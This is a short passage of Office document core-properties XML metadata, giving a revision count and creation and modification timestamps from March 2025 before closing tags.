  <cp:revision>5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-03-16T14:51:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-03-16T16:56:00Z</dcterms:modified>
</cp:coreProperties>
</file>